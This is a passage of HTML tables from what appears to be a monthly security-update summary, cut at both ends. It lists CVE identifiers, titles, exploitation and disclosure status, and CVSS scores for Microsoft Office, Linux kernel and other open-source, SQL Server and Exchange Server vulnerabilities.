href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59224"><span style='font-size: undefined;'>CVE-2025-59224</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59225"><span style='font-size: undefined;'>CVE-2025-59225</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59235"><span style='font-size: undefined;'>CVE-2025-59235</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59232"><span style='font-size: undefined;'>CVE-2025-59232</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59221"><span style='font-size: undefined;'>CVE-2025-59221</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Word Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59229"><span style='font-size: undefined;'>CVE-2025-59229</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr></tbody></table><p></p><p></p><h3 style="direction: ltr;"><strong>Open Source Software vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:10.56%"/><col style="width:47.839999999999996%"/><col style="width:13.76%"/><col style="width:14.719999999999999%"/><col style="width:13.120000000000001%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39907"><span style='font-size: undefined;'>CVE-2025-39907</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mtd: rawnand: stm32_fmc2: avoid overlapping mappings on ECC buffer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39910"><span style='font-size: undefined;'>CVE-2025-39910</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/vmalloc, mm/kasan: respect gfp mask in kasan_populate_vmalloc()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39943"><span style='font-size: undefined;'>CVE-2025-39943</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ksmbd: smbdirect: validate data_offset and data_length field of smb_direct_data_transfer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39898"><span style='font-size: undefined;'>CVE-2025-39898</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>e1000e: fix heap overflow in e1000_set_eeprom</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39925"><span style='font-size: undefined;'>CVE-2025-39925</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>can: j1939: implement NETDEV_UNREGISTER notification handler</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39952"><span style='font-size: undefined;'>CVE-2025-39952</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>wifi: wilc1000: avoid buffer overflow in WID string configuration</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39944"><span style='font-size: undefined;'>CVE-2025-39944</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>octeontx2-pf: Fix use-after-free bugs in otx2_sync_tstamp()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39945"><span style='font-size: undefined;'>CVE-2025-39945</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>cnic: Fix use-after-free bugs in cnic_delete_task</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39955"><span style='font-size: undefined;'>CVE-2025-39955</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tcp: Clear tcp_sk(sk)-&gt;fastopen_rsk in tcp_disconnect().</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39905"><span style='font-size: undefined;'>CVE-2025-39905</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: phylink: add lock for serializing concurrent pl-&gt;phydev writes with resolver</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39901"><span style='font-size: undefined;'>CVE-2025-39901</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>i40e: remove read access to debugfs files</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-53469"><span style='font-size: undefined;'>CVE-2023-53469</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>af_unix: Fix null-ptr-deref in unix_stream_sendpage().</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39913"><span style='font-size: undefined;'>CVE-2025-39913</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-&gt;cork.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39951"><span style='font-size: undefined;'>CVE-2025-39951</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>um: virtio_uml: Fix use-after-free after put_device in probe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39940"><span style='font-size: undefined;'>CVE-2025-39940</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>dm-stripe: fix a possible integer overflow</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39961"><span style='font-size: undefined;'>CVE-2025-39961</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>iommu/amd/pgtbl: Fix possible race while increase page table level</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-37727"><span style='font-size: undefined;'>CVE-2025-37727</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Elasticsearch Insertion of sensitive information in log file</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39891"><span style='font-size: undefined;'>CVE-2025-39891</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>wifi: mwifiex: Initialize the chan_stats array to zero</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39914"><span style='font-size: undefined;'>CVE-2025-39914</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tracing: Silence warning when chunk allocation fails in trace_pid_write</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39946"><span style='font-size: undefined;'>CVE-2025-39946</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tls: make sure to abort the stream if headers are bogus</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39932"><span style='font-size: undefined;'>CVE-2025-39932</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>smb: client: let smbd_destroy() call disable_work_sync(&info-&gt;post_send_credits_work)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39933"><span style='font-size: undefined;'>CVE-2025-39933</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>smb: client: let recv_done verify data_offset, data_length and remaining_data_length</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39929"><span style='font-size: undefined;'>CVE-2025-39929</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>smb: client: fix smbdirect_recv_io leak in smbd_negotiate() error path</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39895"><span style='font-size: undefined;'>CVE-2025-39895</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>sched: Fix sched_numa_find_nth_cpu() if mask offline</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39949"><span style='font-size: undefined;'>CVE-2025-39949</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>qed: Don't collect too many protection override GRC elements</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39920"><span style='font-size: undefined;'>CVE-2025-39920</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>pcmcia: Add error handling for add_interval() in do_validate_mem()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39937"><span style='font-size: undefined;'>CVE-2025-39937</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: rfkill: gpio: Fix crash due to dereferencering uninitialized pointer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39947"><span style='font-size: undefined;'>CVE-2025-39947</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net/mlx5e: Harden uplink netdev access against device unbind</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-50502"><span style='font-size: undefined;'>CVE-2022-50502</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm: /proc/pid/smaps_rollup: fix no vma's null-deref</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39902"><span style='font-size: undefined;'>CVE-2025-39902</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/slub: avoid accessing metadata when pointer is invalid in object_err()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39916"><span style='font-size: undefined;'>CVE-2025-39916</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/damon/reclaim: avoid divide-by-zero in damon_reclaim_apply_parameters()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39909"><span style='font-size: undefined;'>CVE-2025-39909</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/damon/lru_sort: avoid divide-by-zero in damon_lru_sort_apply_parameters()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39942"><span style='font-size: undefined;'>CVE-2025-39942</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ksmbd: smbdirect: verify remaining_data_length respects max_fragmented_recv_size</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39934"><span style='font-size: undefined;'>CVE-2025-39934</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>drm: bridge: anx7625: Fix NULL pointer dereference with early IRQ</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39923"><span style='font-size: undefined;'>CVE-2025-39923</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>dmaengine: qcom: bam_dma: Fix DT error handling for num-channels/ees</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39931"><span style='font-size: undefined;'>CVE-2025-39931</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>crypto: af_alg - Set merge to zero early in af_alg_sendmsg</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39953"><span style='font-size: undefined;'>CVE-2025-39953</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>cgroup: split cgroup_destroy_wq into 3 workqueues</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39938"><span style='font-size: undefined;'>CVE-2025-39938</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ASoC: qcom: q6apm-lpass-dais: Fix NULL pointer dereference if source graph failed</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-59288"><span style='font-size: undefined;'>CVE-2025-59288</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Playwright Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39927"><span style='font-size: undefined;'>CVE-2025-39927</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ceph: fix race condition validating r_parent before applying state</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39957"><span style='font-size: undefined;'>CVE-2025-39957</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>wifi: mac80211: increase scan_ies_len for S1G</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39958"><span style='font-size: undefined;'>CVE-2025-39958</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>iommu/s390: Make attach succeed when the device was surprise removed</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39911"><span style='font-size: undefined;'>CVE-2025-39911</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>i40e: fix IRQ freeing in i40e_vsi_request_irq_msix error path</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>SQL Server vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:14.743589743589745%"/><col style="width:36.217948717948715%"/><col style="width:13.782051282051283%"/><col style="width:18.108974358974358%"/><col style="width:17.147435897435898%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59250"><span style='font-size: undefined;'>CVE-2025-59250</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>JDBC Driver for SQL Server Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.1</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Server Software vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:13.942307692307693%"/><col style="width:38.621794871794876%"/><col style="width:13.782051282051283%"/><col style="width:17.307692307692307%"/><col style="width:16.346153846153847%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59249"><span style='font-size: undefined;'>CVE-2025-59249</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Exchange Server Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53782"><span style='font-size: undefined;'>CVE-2025-53782</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Exchange Server Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59248"><span style='font-size: undefined;'>CVE-2025-59248</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Exchange Server Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>System Center vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:13.942307692307693%"/><col 